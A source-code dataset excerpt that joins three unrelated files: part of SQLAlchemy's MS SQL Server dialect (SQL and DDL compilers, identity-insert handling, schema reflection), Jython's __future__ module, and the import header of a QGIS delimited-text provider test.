return self._extend(
"VARBINARY",
type_,
length=type_.length or 'max')
def visit_boolean(self, type_, **kw):
return self.visit_BIT(type_)
def visit_BIT(self, type_, **kw):
return "BIT"
def visit_MONEY(self, type_, **kw):
return "MONEY"
def visit_SMALLMONEY(self, type_, **kw):
return 'SMALLMONEY'
def visit_UNIQUEIDENTIFIER(self, type_, **kw):
return "UNIQUEIDENTIFIER"
def visit_SQL_VARIANT(self, type_, **kw):
return 'SQL_VARIANT'
class MSExecutionContext(default.DefaultExecutionContext):
_enable_identity_insert = False
_select_lastrowid = False
_result_proxy = None
_lastrowid = None
def _opt_encode(self, statement):
if not self.dialect.supports_unicode_statements:
return self.dialect._encoder(statement)[0]
else:
return statement
def pre_exec(self):
"""Activate IDENTITY_INSERT if needed."""
if self.isinsert:
tbl = self.compiled.statement.table
seq_column = tbl._autoincrement_column
insert_has_sequence = seq_column is not None
if insert_has_sequence:
self._enable_identity_insert = \
seq_column.key in self.compiled_parameters[0] or \
(
self.compiled.statement.parameters and (
(
self.compiled.statement._has_multi_parameters
and
seq_column.key in
self.compiled.statement.parameters[0]
) or (
not
self.compiled.statement._has_multi_parameters
and
seq_column.key in
self.compiled.statement.parameters
)
)
)
else:
self._enable_identity_insert = False
self._select_lastrowid = insert_has_sequence and \
not self.compiled.returning and \
not self._enable_identity_insert and \
not self.executemany
if self._enable_identity_insert:
self.root_connection._cursor_execute(
self.cursor,
self._opt_encode(
"SET IDENTITY_INSERT %s ON" %
self.dialect.identifier_preparer.format_table(tbl)),
(),
self)
def post_exec(self):
"""Disable IDENTITY_INSERT if enabled."""
conn = self.root_connection
if self._select_lastrowid:
if self.dialect.use_scope_identity:
conn._cursor_execute(
self.cursor,
"SELECT scope_identity() AS lastrowid", (), self)
else:
conn._cursor_execute(self.cursor,
"SELECT @@identity AS lastrowid",
(),
self)
# fetchall() ensures the cursor is consumed without closing it
row = self.cursor.fetchall()[0]
self._lastrowid = int(row[0])
if (self.isinsert or self.isupdate or self.isdelete) and \
self.compiled.returning:
self._result_proxy = engine.FullyBufferedResultProxy(self)
if self._enable_identity_insert:
conn._cursor_execute(
self.cursor,
self._opt_encode(
"SET IDENTITY_INSERT %s OFF" %
self.dialect.identifier_preparer. format_table(
self.compiled.statement.table)),
(),
self)
def get_lastrowid(self):
return self._lastrowid
def handle_dbapi_exception(self, e):
if self._enable_identity_insert:
try:
self.cursor.execute(
self._opt_encode(
"SET IDENTITY_INSERT %s OFF" %
self.dialect.identifier_preparer. format_table(
self.compiled.statement.table)))
except Exception:
pass
def get_result_proxy(self):
if self._result_proxy:
return self._result_proxy
else:
return engine.ResultProxy(self)
class MSSQLCompiler(compiler.SQLCompiler):
returning_precedes_values = True
extract_map = util.update_copy(
compiler.SQLCompiler.extract_map,
{
'doy': 'dayofyear',
'dow': 'weekday',
'milliseconds': 'millisecond',
'microseconds': 'microsecond'
})
def __init__(self, *args, **kwargs):
self.tablealiases = {}
super(MSSQLCompiler, self).__init__(*args, **kwargs)
def _with_legacy_schema_aliasing(fn):
def decorate(self, *arg, **kw):
if self.dialect.legacy_schema_aliasing:
return fn(self, *arg, **kw)
else:
super_ = getattr(super(MSSQLCompiler, self), fn.__name__)
return super_(*arg, **kw)
return decorate
def visit_now_func(self, fn, **kw):
return "CURRENT_TIMESTAMP"
def visit_current_date_func(self, fn, **kw):
return "GETDATE()"
def visit_length_func(self, fn, **kw):
return "LEN%s" % self.function_argspec(fn, **kw)
def visit_char_length_func(self, fn, **kw):
return "LEN%s" % self.function_argspec(fn, **kw)
def visit_concat_op_binary(self, binary, operator, **kw):
return "%s + %s" % \
(self.process(binary.left, **kw),
self.process(binary.right, **kw))
def visit_true(self, expr, **kw):
return '1'
def visit_false(self, expr, **kw):
return '0'
def visit_match_op_binary(self, binary, operator, **kw):
return "CONTAINS (%s, %s)" % (
self.process(binary.left, **kw),
self.process(binary.right, **kw))
def get_select_precolumns(self, select, **kw):
""" MS-SQL puts TOP, it's version of LIMIT here """
s = ""
if select._distinct:
s += "DISTINCT "
if select._simple_int_limit and not select._offset:
# ODBC drivers and possibly others
# don't support bind params in the SELECT clause on SQL Server.
# so have to use literal here.
s += "TOP %d " % select._limit
if s:
return s
else:
return compiler.SQLCompiler.get_select_precolumns(
self, select, **kw)
def get_from_hint_text(self, table, text):
return text
def get_crud_hint_text(self, table, text):
return text
def limit_clause(self, select, **kw):
# Limit in mssql is after the select keyword
return ""
def visit_select(self, select, **kwargs):
"""Look for ``LIMIT`` and OFFSET in a select statement, and if
so tries to wrap it in a subquery with ``row_number()`` criterion.
"""
if (
(
not select._simple_int_limit and
select._limit_clause is not None
) or (
select._offset_clause is not None and
not select._simple_int_offset or select._offset
)
) and not getattr(select, '_mssql_visit', None):
# to use ROW_NUMBER(), an ORDER BY is required.
if not select._order_by_clause.clauses:
raise exc.CompileError('MSSQL requires an order_by when '
'using an OFFSET or a non-simple '
'LIMIT clause')
_order_by_clauses = [
sql_util.unwrap_label_reference(elem)
for elem in select._order_by_clause.clauses
]
limit_clause = select._limit_clause
offset_clause = select._offset_clause
kwargs['select_wraps_for'] = select
select = select._generate()
select._mssql_visit = True
select = select.column(
sql.func.ROW_NUMBER().over(order_by=_order_by_clauses)
.label("mssql_rn")).order_by(None).alias()
mssql_rn = sql.column('mssql_rn')
limitselect = sql.select([c for c in select.c if
c.key != 'mssql_rn'])
if offset_clause is not None:
limitselect.append_whereclause(mssql_rn > offset_clause)
if limit_clause is not None:
limitselect.append_whereclause(
mssql_rn <= (limit_clause + offset_clause))
else:
limitselect.append_whereclause(
mssql_rn <= (limit_clause))
return self.process(limitselect, **kwargs)
else:
return compiler.SQLCompiler.visit_select(self, select, **kwargs)
@_with_legacy_schema_aliasing
def visit_table(self, table, mssql_aliased=False, iscrud=False, **kwargs):
if mssql_aliased is table or iscrud:
return super(MSSQLCompiler, self).visit_table(table, **kwargs)
# alias schema-qualified tables
alias = self._schema_aliased_table(table)
if alias is not None:
return self.process(alias, mssql_aliased=table, **kwargs)
else:
return super(MSSQLCompiler, self).visit_table(table, **kwargs)
@_with_legacy_schema_aliasing
def visit_alias(self, alias, **kw):
# translate for schema-qualified table aliases
kw['mssql_aliased'] = alias.original
return super(MSSQLCompiler, self).visit_alias(alias, **kw)
@_with_legacy_schema_aliasing
def visit_column(self, column, add_to_result_map=None, **kw):
if column.table is not None and \
(not self.isupdate and not self.isdelete) or \
self.is_subquery():
# translate for schema-qualified table aliases
t = self._schema_aliased_table(column.table)
if t is not None:
converted = expression._corresponding_column_or_error(
t, column)
if add_to_result_map is not None:
add_to_result_map(
column.name,
column.name,
(column, column.name, column.key),
column.type
)
return super(MSSQLCompiler, self).\
visit_column(converted, **kw)
return super(MSSQLCompiler, self).visit_column(
column, add_to_result_map=add_to_result_map, **kw)
def _schema_aliased_table(self, table):
if getattr(table, 'schema', None) is not None:
if table not in self.tablealiases:
self.tablealiases[table] = table.alias()
return self.tablealiases[table]
else:
return None
def visit_extract(self, extract, **kw):
field = self.extract_map.get(extract.field, extract.field)
return 'DATEPART(%s, %s)' % \
(field, self.process(extract.expr, **kw))
def visit_savepoint(self, savepoint_stmt):
return "SAVE TRANSACTION %s" % \
self.preparer.format_savepoint(savepoint_stmt)
def visit_rollback_to_savepoint(self, savepoint_stmt):
return ("ROLLBACK TRANSACTION %s"
% self.preparer.format_savepoint(savepoint_stmt))
def visit_binary(self, binary, **kwargs):
"""Move bind parameters to the right-hand side of an operator, where
possible.
"""
if (
isinstance(binary.left, expression.BindParameter)
and binary.operator == operator.eq
and not isinstance(binary.right, expression.BindParameter)
):
return self.process(
expression.BinaryExpression(binary.right,
binary.left,
binary.operator),
**kwargs)
return super(MSSQLCompiler, self).visit_binary(binary, **kwargs)
def returning_clause(self, stmt, returning_cols):
if self.isinsert or self.isupdate:
target = stmt.table.alias("inserted")
else:
target = stmt.table.alias("deleted")
adapter = sql_util.ClauseAdapter(target)
columns = [
self._label_select_column(None, adapter.traverse(c),
True, False, {})
for c in expression._select_iterables(returning_cols)
]
return 'OUTPUT ' + ', '.join(columns)
def get_cte_preamble(self, recursive):
# SQL Server finds it too inconvenient to accept
# an entirely optional, SQL standard specified,
# "RECURSIVE" word with their "WITH",
# so here we go
return "WITH"
def label_select_column(self, select, column, asfrom):
if isinstance(column, expression.Function):
return column.label(None)
else:
return super(MSSQLCompiler, self).\
label_select_column(select, column, asfrom)
def for_update_clause(self, select):
# "FOR UPDATE" is only allowed on "DECLARE CURSOR" which
# SQLAlchemy doesn't use
return ''
def order_by_clause(self, select, **kw):
order_by = self.process(select._order_by_clause, **kw)
# MSSQL only allows ORDER BY in subqueries if there is a LIMIT
if order_by and (not self.is_subquery() or select._limit):
return " ORDER BY " + order_by
else:
return ""
def update_from_clause(self, update_stmt,
from_table, extra_froms,
from_hints,
**kw):
"""Render the UPDATE..FROM clause specific to MSSQL.
In MSSQL, if the UPDATE statement involves an alias of the table to
be updated, then the table itself must be added to the FROM list as
well. Otherwise, it is optional. Here, we add it regardless.
"""
return "FROM " + ', '.join(
t._compiler_dispatch(self, asfrom=True,
fromhints=from_hints, **kw)
for t in [from_table] + extra_froms)
class MSSQLStrictCompiler(MSSQLCompiler):
"""A subclass of MSSQLCompiler which disables the usage of bind
parameters where not allowed natively by MS-SQL.
A dialect may use this compiler on a platform where native
binds are used.
"""
ansi_bind_rules = True
def visit_in_op_binary(self, binary, operator, **kw):
kw['literal_binds'] = True
return "%s IN %s" % (
self.process(binary.left, **kw),
self.process(binary.right, **kw)
)
def visit_notin_op_binary(self, binary, operator, **kw):
kw['literal_binds'] = True
return "%s NOT IN %s" % (
self.process(binary.left, **kw),
self.process(binary.right, **kw)
)
def render_literal_value(self, value, type_):
"""
For date and datetime values, convert to a string
format acceptable to MSSQL. That seems to be the
so-called ODBC canonical date format which looks
like this:
yyyy-mm-dd hh:mi:ss.mmm(24h)
For other data types, call the base class implementation.
"""
# datetime and date are both subclasses of datetime.date
if issubclass(type(value), datetime.date):
# SQL Server wants single quotes around the date string.
return "'" + str(value) + "'"
else:
return super(MSSQLStrictCompiler, self).\
render_literal_value(value, type_)
class MSDDLCompiler(compiler.DDLCompiler):
def get_column_specification(self, column, **kwargs):
colspec = (
self.preparer.format_column(column) + " "
+ self.dialect.type_compiler.process(
column.type, type_expression=column)
)
if column.nullable is not None:
if not column.nullable or column.primary_key or \
isinstance(column.default, sa_schema.Sequence):
colspec += " NOT NULL"
else:
colspec += " NULL"
if column.table is None:
raise exc.CompileError(
"mssql requires Table-bound columns "
"in order to generate DDL")
# install an IDENTITY Sequence if we either a sequence or an implicit
# IDENTITY column
if isinstance(column.default, sa_schema.Sequence):
if column.default.start == 0:
start = 0
else:
start = column.default.start or 1
colspec += " IDENTITY(%s,%s)" % (start,
column.default.increment or 1)
elif column is column.table._autoincrement_column:
colspec += " IDENTITY(1,1)"
else:
default = self.get_column_default_string(column)
if default is not None:
colspec += " DEFAULT " + default
return colspec
def visit_create_index(self, create, include_schema=False):
index = create.element
self._verify_index_table(index)
preparer = self.preparer
text = "CREATE "
if index.unique:
text += "UNIQUE "
# handle clustering option
clustered = index.dialect_options['mssql']['clustered']
if clustered is not None:
if clustered:
text += "CLUSTERED "
else:
text += "NONCLUSTERED "
text += "INDEX %s ON %s (%s)" \
% (
self._prepared_index_name(index,
include_schema=include_schema),
preparer.format_table(index.table),
', '.join(
self.sql_compiler.process(expr,
include_table=False,
literal_binds=True) for
expr in index.expressions)
)
# handle other included columns
if index.dialect_options['mssql']['include']:
inclusions = [index.table.c[col]
if isinstance(col, util.string_types) else col
for col in
index.dialect_options['mssql']['include']
]
text += " INCLUDE (%s)" \
% ', '.join([preparer.quote(c.name)
for c in inclusions])
return text
def visit_drop_index(self, drop):
return "\nDROP INDEX %s ON %s" % (
self._prepared_index_name(drop.element, include_schema=False),
self.preparer.format_table(drop.element.table)
)
def visit_primary_key_constraint(self, constraint):
if len(constraint) == 0:
return ''
text = ""
if constraint.name is not None:
text += "CONSTRAINT %s " % \
self.preparer.format_constraint(constraint)
text += "PRIMARY KEY "
clustered = constraint.dialect_options['mssql']['clustered']
if clustered is not None:
if clustered:
text += "CLUSTERED "
else:
text += "NONCLUSTERED "
text += "(%s)" % ', '.join(self.preparer.quote(c.name)
for c in constraint)
text += self.define_constraint_deferrability(constraint)
return text
def visit_unique_constraint(self, constraint):
if len(constraint) == 0:
return ''
text = ""
if constraint.name is not None:
text += "CONSTRAINT %s " % \
self.preparer.format_constraint(constraint)
text += "UNIQUE "
clustered = constraint.dialect_options['mssql']['clustered']
if clustered is not None:
if clustered:
text += "CLUSTERED "
else:
text += "NONCLUSTERED "
text += "(%s)" % ', '.join(self.preparer.quote(c.name)
for c in constraint)
text += self.define_constraint_deferrability(constraint)
return text
class MSIdentifierPreparer(compiler.IdentifierPreparer):
reserved_words = RESERVED_WORDS
def __init__(self, dialect):
super(MSIdentifierPreparer, self).__init__(dialect, initial_quote='[',
final_quote=']')
def _escape_identifier(self, value):
return value
def quote_schema(self, schema, force=None):
"""Prepare a quoted table and schema name."""
result = '.'.join([self.quote(x, force) for x in schema.split('.')])
return result
def _db_plus_owner_listing(fn):
def wrap(dialect, connection, schema=None, **kw):
dbname, owner = _owner_plus_db(dialect, schema)
return _switch_db(dbname, connection, fn, dialect, connection,
dbname, owner, schema, **kw)
return update_wrapper(wrap, fn)
def _db_plus_owner(fn):
def wrap(dialect, connection, tablename, schema=None, **kw):
dbname, owner = _owner_plus_db(dialect, schema)
return _switch_db(dbname, connection, fn, dialect, connection,
tablename, dbname, owner, schema, **kw)
return update_wrapper(wrap, fn)
def _switch_db(dbname, connection, fn, *arg, **kw):
if dbname:
current_db = connection.scalar("select db_name()")
connection.execute("use %s" % dbname)
try:
return fn(*arg, **kw)
finally:
if dbname:
connection.execute("use %s" % current_db)
def _owner_plus_db(dialect, schema):
if not schema:
return None, dialect.default_schema_name
elif "." in schema:
return schema.split(".", 1)
else:
return None, schema
class MSDialect(default.DefaultDialect):
name = 'mssql'
supports_default_values = True
supports_empty_insert = False
execution_ctx_cls = MSExecutionContext
use_scope_identity = True
max_identifier_length = 128
schema_name = "dbo"
colspecs = {
sqltypes.DateTime: _MSDateTime,
sqltypes.Date: _MSDate,
sqltypes.Time: TIME,
}
engine_config_types = default.DefaultDialect.engine_config_types.union([
('legacy_schema_aliasing', util.asbool),
])
ischema_names = ischema_names
supports_native_boolean = False
supports_unicode_binds = True
postfetch_lastrowid = True
server_version_info = ()
statement_compiler = MSSQLCompiler
ddl_compiler = MSDDLCompiler
type_compiler = MSTypeCompiler
preparer = MSIdentifierPreparer
construct_arguments = [
(sa_schema.PrimaryKeyConstraint, {
"clustered": None
}),
(sa_schema.UniqueConstraint, {
"clustered": None
}),
(sa_schema.Index, {
"clustered": None,
"include": None
})
]
def __init__(self,
query_timeout=None,
use_scope_identity=True,
max_identifier_length=None,
schema_name="dbo",
isolation_level=None,
deprecate_large_types=None,
legacy_schema_aliasing=False, **opts):
self.query_timeout = int(query_timeout or 0)
self.schema_name = schema_name
self.use_scope_identity = use_scope_identity
self.max_identifier_length = int(max_identifier_length or 0) or \
self.max_identifier_length
self.deprecate_large_types = deprecate_large_types
self.legacy_schema_aliasing = legacy_schema_aliasing
super(MSDialect, self).__init__(**opts)
self.isolation_level = isolation_level
def do_savepoint(self, connection, name):
# give the DBAPI a push
connection.execute("IF @@TRANCOUNT = 0 BEGIN TRANSACTION")
super(MSDialect, self).do_savepoint(connection, name)
def do_release_savepoint(self, connection, name):
# SQL Server does not support RELEASE SAVEPOINT
pass
_isolation_lookup = set(['SERIALIZABLE', 'READ UNCOMMITTED',
'READ COMMITTED', 'REPEATABLE READ',
'SNAPSHOT'])
def set_isolation_level(self, connection, level):
level = level.replace('_', ' ')
if level not in self._isolation_lookup:
raise exc.ArgumentError(
"Invalid value '%s' for isolation_level. "
"Valid isolation levels for %s are %s" %
(level, self.name, ", ".join(self._isolation_lookup))
)
cursor = connection.cursor()
cursor.execute(
"SET TRANSACTION ISOLATION LEVEL %s" % level)
cursor.close()
def get_isolation_level(self, connection):
cursor = connection.cursor()
cursor.execute("""
SELECT CASE transaction_isolation_level
WHEN 0 THEN NULL
WHEN 1 THEN 'READ UNCOMMITTED'
WHEN 2 THEN 'READ COMMITTED'
WHEN 3 THEN 'REPEATABLE READ'
WHEN 4 THEN 'SERIALIZABLE'
WHEN 5 THEN 'SNAPSHOT' END AS TRANSACTION_ISOLATION_LEVEL
FROM sys.dm_exec_sessions
where session_id = @@SPID
""")
val = cursor.fetchone()[0]
cursor.close()
return val.upper()
def initialize(self, connection):
super(MSDialect, self).initialize(connection)
self._setup_version_attributes()
def on_connect(self):
if self.isolation_level is not None:
def connect(conn):
self.set_isolation_level(conn, self.isolation_level)
return connect
else:
return None
def _setup_version_attributes(self):
if self.server_version_info[0] not in list(range(8, 17)):
# FreeTDS with version 4.2 seems to report here
# a number like "95.10.255". Don't know what
# that is. So emit warning.
# Use TDS Version 7.0 through 7.3, per the MS information here:
# https://msdn.microsoft.com/en-us/library/dd339982.aspx
# and FreeTDS information here (7.3 highest supported version):
# http://www.freetds.org/userguide/choosingtdsprotocol.htm
util.warn(
"Unrecognized server version info '%s'. Version specific "
"behaviors may not function properly. If using ODBC "
"with FreeTDS, ensure TDS_VERSION 7.0 through 7.3, not "
"4.2, is configured in the FreeTDS configuration." %
".".join(str(x) for x in self.server_version_info))
if self.server_version_info >= MS_2005_VERSION and \
'implicit_returning' not in self.__dict__:
self.implicit_returning = True
if self.server_version_info >= MS_2008_VERSION:
self.supports_multivalues_insert = True
if self.deprecate_large_types is None:
self.deprecate_large_types = \
self.server_version_info >= MS_2012_VERSION
def _get_default_schema_name(self, connection):
if self.server_version_info < MS_2005_VERSION:
return self.schema_name
query = sql.text("""
SELECT default_schema_name FROM
sys.database_principals
WHERE principal_id=database_principal_id()
""")
default_schema_name = connection.scalar(query)
if default_schema_name is not None:
return util.text_type(default_schema_name)
else:
return self.schema_name
@_db_plus_owner
def has_table(self, connection, tablename, dbname, owner, schema):
columns = ischema.columns
whereclause = columns.c.table_name == tablename
if owner:
whereclause = sql.and_(whereclause,
columns.c.table_schema == owner)
s = sql.select([columns], whereclause)
c = connection.execute(s)
return c.first() is not None
@reflection.cache
def get_schema_names(self, connection, **kw):
s = sql.select([ischema.schemata.c.schema_name],
order_by=[ischema.schemata.c.schema_name]
)
schema_names = [r[0] for r in connection.execute(s)]
return schema_names
@reflection.cache
@_db_plus_owner_listing
def get_table_names(self, connection, dbname, owner, schema, **kw):
tables = ischema.tables
s = sql.select([tables.c.table_name],
sql.and_(
tables.c.table_schema == owner,
tables.c.table_type == 'BASE TABLE'
),
order_by=[tables.c.table_name]
)
table_names = [r[0] for r in connection.execute(s)]
return table_names
@reflection.cache
@_db_plus_owner_listing
def get_view_names(self, connection, dbname, owner, schema, **kw):
tables = ischema.tables
s = sql.select([tables.c.table_name],
sql.and_(
tables.c.table_schema == owner,
tables.c.table_type == 'VIEW'
),
order_by=[tables.c.table_name]
)
view_names = [r[0] for r in connection.execute(s)]
return view_names
@reflection.cache
@_db_plus_owner
def get_indexes(self, connection, tablename, dbname, owner, schema, **kw):
# using system catalogs, don't support index reflection
# below MS 2005
if self.server_version_info < MS_2005_VERSION:
return []
rp = connection.execute(
sql.text("select ind.index_id, ind.is_unique, ind.name "
"from sys.indexes as ind join sys.tables as tab on "
"ind.object_id=tab.object_id "
"join sys.schemas as sch on sch.schema_id=tab.schema_id "
"where tab.name = :tabname "
"and sch.name=:schname "
"and ind.is_primary_key=0",
bindparams=[
sql.bindparam('tabname', tablename,
sqltypes.String(convert_unicode=True)),
sql.bindparam('schname', owner,
sqltypes.String(convert_unicode=True))
],
typemap={
'name': sqltypes.Unicode()
}
)
)
indexes = {}
for row in rp:
indexes[row['index_id']] = {
'name': row['name'],
'unique': row['is_unique'] == 1,
'column_names': []
}
rp = connection.execute(
sql.text(
"select ind_col.index_id, ind_col.object_id, col.name "
"from sys.columns as col "
"join sys.tables as tab on tab.object_id=col.object_id "
"join sys.index_columns as ind_col on "
"(ind_col.column_id=col.column_id and "
"ind_col.object_id=tab.object_id) "
"join sys.schemas as sch on sch.schema_id=tab.schema_id "
"where tab.name=:tabname "
"and sch.name=:schname",
bindparams=[
sql.bindparam('tabname', tablename,
sqltypes.String(convert_unicode=True)),
sql.bindparam('schname', owner,
sqltypes.String(convert_unicode=True))
],
typemap={'name': sqltypes.Unicode()}
),
)
for row in rp:
if row['index_id'] in indexes:
indexes[row['index_id']]['column_names'].append(row['name'])
return list(indexes.values())
@reflection.cache
@_db_plus_owner
def get_view_definition(self, connection, viewname,
dbname, owner, schema, **kw):
rp = connection.execute(
sql.text(
"select definition from sys.sql_modules as mod, "
"sys.views as views, "
"sys.schemas as sch"
" where "
"mod.object_id=views.object_id and "
"views.schema_id=sch.schema_id and "
"views.name=:viewname and sch.name=:schname",
bindparams=[
sql.bindparam('viewname', viewname,
sqltypes.String(convert_unicode=True)),
sql.bindparam('schname', owner,
sqltypes.String(convert_unicode=True))
]
)
)
if rp:
view_def = rp.scalar()
return view_def
@reflection.cache
@_db_plus_owner
def get_columns(self, connection, tablename, dbname, owner, schema, **kw):
# Get base columns
columns = ischema.columns
if owner:
whereclause = sql.and_(columns.c.table_name == tablename,
columns.c.table_schema == owner)
else:
whereclause = columns.c.table_name == tablename
s = sql.select([columns], whereclause,
order_by=[columns.c.ordinal_position])
c = connection.execute(s)
cols = []
while True:
row = c.fetchone()
if row is None:
break
(name, type, nullable, charlen,
numericprec, numericscale, default, collation) = (
row[columns.c.column_name],
row[columns.c.data_type],
row[columns.c.is_nullable] == 'YES',
row[columns.c.character_maximum_length],
row[columns.c.numeric_precision],
row[columns.c.numeric_scale],
row[columns.c.column_default],
row[columns.c.collation_name]
)
coltype = self.ischema_names.get(type, None)
kwargs = {}
if coltype in (MSString, MSChar, MSNVarchar, MSNChar, MSText,
MSNText, MSBinary, MSVarBinary,
sqltypes.LargeBinary):
if charlen == -1:
charlen = None
kwargs['length'] = charlen
if collation:
kwargs['collation'] = collation
if coltype is None:
util.warn(
"Did not recognize type '%s' of column '%s'" %
(type, name))
coltype = sqltypes.NULLTYPE
else:
if issubclass(coltype, sqltypes.Numeric) and \
coltype is not MSReal:
kwargs['scale'] = numericscale
kwargs['precision'] = numericprec
coltype = coltype(**kwargs)
cdict = {
'name': name,
'type': coltype,
'nullable': nullable,
'default': default,
'autoincrement': False,
}
cols.append(cdict)
# autoincrement and identity
colmap = {}
for col in cols:
colmap[col['name']] = col
# We also run an sp_columns to check for identity columns:
cursor = connection.execute("sp_columns @table_name = '%s', "
"@table_owner = '%s'"
% (tablename, owner))
ic = None
while True:
row = cursor.fetchone()
if row is None:
break
(col_name, type_name) = row[3], row[5]
if type_name.endswith("identity") and col_name in colmap:
ic = col_name
colmap[col_name]['autoincrement'] = True
colmap[col_name]['sequence'] = dict(
name='%s_identity' % col_name)
break
cursor.close()
if ic is not None and self.server_version_info >= MS_2005_VERSION:
table_fullname = "%s.%s" % (owner, tablename)
cursor = connection.execute(
"select ident_seed('%s'), ident_incr('%s')"
% (table_fullname, table_fullname)
)
row = cursor.first()
if row is not None and row[0] is not None:
colmap[ic]['sequence'].update({
'start': int(row[0]),
'increment': int(row[1])
})
return cols
@reflection.cache
@_db_plus_owner
def get_pk_constraint(self, connection, tablename,
dbname, owner, schema, **kw):
pkeys = []
TC = ischema.constraints
C = ischema.key_constraints.alias('C')
# Primary key constraints
s = sql.select([C.c.column_name,
TC.c.constraint_type,
C.c.constraint_name],
sql.and_(TC.c.constraint_name == C.c.constraint_name,
TC.c.table_schema == C.c.table_schema,
C.c.table_name == tablename,
C.c.table_schema == owner)
)
c = connection.execute(s)
constraint_name = None
for row in c:
if 'PRIMARY' in row[TC.c.constraint_type.name]:
pkeys.append(row[0])
if constraint_name is None:
constraint_name = row[C.c.constraint_name.name]
return {'constrained_columns': pkeys, 'name': constraint_name}
@reflection.cache
@_db_plus_owner
def get_foreign_keys(self, connection, tablename,
dbname, owner, schema, **kw):
RR = ischema.ref_constraints
C = ischema.key_constraints.alias('C')
R = ischema.key_constraints.alias('R')
# Foreign key constraints
s = sql.select([C.c.column_name,
R.c.table_schema, R.c.table_name, R.c.column_name,
RR.c.constraint_name, RR.c.match_option,
RR.c.update_rule,
RR.c.delete_rule],
sql.and_(C.c.table_name == tablename,
C.c.table_schema == owner,
C.c.constraint_name == RR.c.constraint_name,
R.c.constraint_name ==
RR.c.unique_constraint_name,
C.c.ordinal_position == R.c.ordinal_position
),
order_by=[RR.c.constraint_name, R.c.ordinal_position]
)
# group rows by constraint ID, to handle multi-column FKs
fkeys = []
fknm, scols, rcols = (None, [], [])
def fkey_rec():
return {
'name': None,
'constrained_columns': [],
'referred_schema': None,
'referred_table': None,
'referred_columns': []
}
fkeys = util.defaultdict(fkey_rec)
for r in connection.execute(s).fetchall():
scol, rschema, rtbl, rcol, rfknm, fkmatch, fkuprule, fkdelrule = r
rec = fkeys[rfknm]
rec['name'] = rfknm
if not rec['referred_table']:
rec['referred_table'] = rtbl
if schema is not None or owner != rschema:
if dbname:
rschema = dbname + "." + rschema
rec['referred_schema'] = rschema
local_cols, remote_cols = \
rec['constrained_columns'],\
rec['referred_columns']
local_cols.append(scol)
remote_cols.append(rcol)
return list(fkeys.values())
| mit |
ivan-fedorov/intellij-community | python/lib/Lib/__future__.py | 91 | 3906 | """Record of phased-in incompatible language changes.
Each line is of the form:
FeatureName = "_Feature(" OptionalRelease "," MandatoryRelease ","
CompilerFlag ")"
where, normally, OptionalRelease < MandatoryRelease, and both are 5-tuples
of the same form as sys.version_info:
(PY_MAJOR_VERSION, # the 2 in 2.1.0a3; an int
PY_MINOR_VERSION, # the 1; an int
PY_MICRO_VERSION, # the 0; an int
PY_RELEASE_LEVEL, # "alpha", "beta", "candidate" or "final"; string
PY_RELEASE_SERIAL # the 3; an int
)
OptionalRelease records the first release in which
from __future__ import FeatureName
was accepted.
In the case of MandatoryReleases that have not yet occurred,
MandatoryRelease predicts the release in which the feature will become part
of the language.
Else MandatoryRelease records when the feature became part of the language;
in releases at or after that, modules no longer need
from __future__ import FeatureName
to use the feature in question, but may continue to use such imports.
MandatoryRelease may also be None, meaning that a planned feature got
dropped.
Instances of class _Feature have two corresponding methods,
.getOptionalRelease() and .getMandatoryRelease().
CompilerFlag is the (bitfield) flag that should be passed in the fourth
argument to the builtin function compile() to enable the feature in
dynamically compiled code. This flag is stored in the .compiler_flag
attribute on _Future instances. These values must match the appropriate
#defines of CO_xxx flags in Include/compile.h.
No feature line is ever to be deleted from this file.
"""
all_feature_names = [
"nested_scopes",
"generators",
"division",
"absolute_import",
"with_statement",
]
__all__ = ["all_feature_names"] + all_feature_names
# The CO_xxx symbols are defined here under the same names used by
# compile.h, so that an editor search will find them here. However,
# they're not exported in __all__, because they don't really belong to
# this module.
CO_NESTED = 0x0010 # nested_scopes
CO_GENERATOR_ALLOWED = 0 # generators (obsolete, was 0x1000)
CO_FUTURE_DIVISION = 0x2000 # division
CO_FUTURE_ABSOLUTE_IMPORT = 0x4000 # perform absolute imports by default
CO_FUTURE_WITH_STATEMENT = 0x8000 # with statement
class _Feature:
def __init__(self, optionalRelease, mandatoryRelease, compiler_flag):
self.optional = optionalRelease
self.mandatory = mandatoryRelease
self.compiler_flag = compiler_flag
def getOptionalRelease(self):
"""Return first release in which this feature was recognized.
This is a 5-tuple, of the same form as sys.version_info.
"""
return self.optional
def getMandatoryRelease(self):
"""Return release in which this feature will become mandatory.
This is a 5-tuple, of the same form as sys.version_info, or, if
the feature was dropped, is None.
"""
return self.mandatory
def __repr__(self):
return "_Feature" + repr((self.optional,
self.mandatory,
self.compiler_flag))
nested_scopes = _Feature((2, 1, 0, "beta", 1),
(2, 2, 0, "alpha", 0),
CO_NESTED)
generators = _Feature((2, 2, 0, "alpha", 1),
(2, 3, 0, "final", 0),
CO_GENERATOR_ALLOWED)
division = _Feature((2, 2, 0, "alpha", 2),
(3, 0, 0, "alpha", 0),
CO_FUTURE_DIVISION)
absolute_import = _Feature((2, 5, 0, "alpha", 1),
(2, 7, 0, "alpha", 0),
CO_FUTURE_ABSOLUTE_IMPORT)
with_statement = _Feature((2, 5, 0, "alpha", 1),
(2, 6, 0, "alpha", 0),
CO_FUTURE_WITH_STATEMENT)
| apache-2.0 |
timlinux/QGIS | tests/src/python/test_qgsdelimitedtextprovider.py | 9 | 38800 | # -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsDelimitedTextProvider.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Chris Crook'
__date__ = '20/04/2013'
__copyright__ = 'Copyright 2013, The QGIS Project'
# This module provides unit test for the delimited text provider. It uses data files in
# the testdata/delimitedtext directory.
#
# New tests can be created (or existing ones updated), but incorporating a createTest
# call into the test. This will load the file and generate a test that the features
# loaded from it are correct. It assumes that the data is correct at the time the
# test is created. The new test is written to the test output file, and can be edited into
# this module to implement the test.
#
# To recreate all tests, set rebuildTests to true
import qgis # NOQA
import os
import re
import tempfile
import inspect
import time
import test_qgsdelimitedtextprovider_wanted as want # NOQA
from collections.abc import Callable
rebuildTests = 'REBUILD_DELIMITED_TEXT_TESTS' in os.environ
from qgis.PyQt.QtCore import QCoreApplication, QVariant, QUrl, QObject
from qgis.core import (
QgsProviderRegistry,
QgsVectorLayer,
QgsFeatureRequest,
QgsRectangle,
QgsApplication,
QgsFeature,
QgsWkbTypes,
QgsFeatureSource)
from qgis.testing import start_app, unittest
from utilities import unitTestDataPath, compareWkt, compareUrl
from providertestbase import ProviderTestCase
start_app()
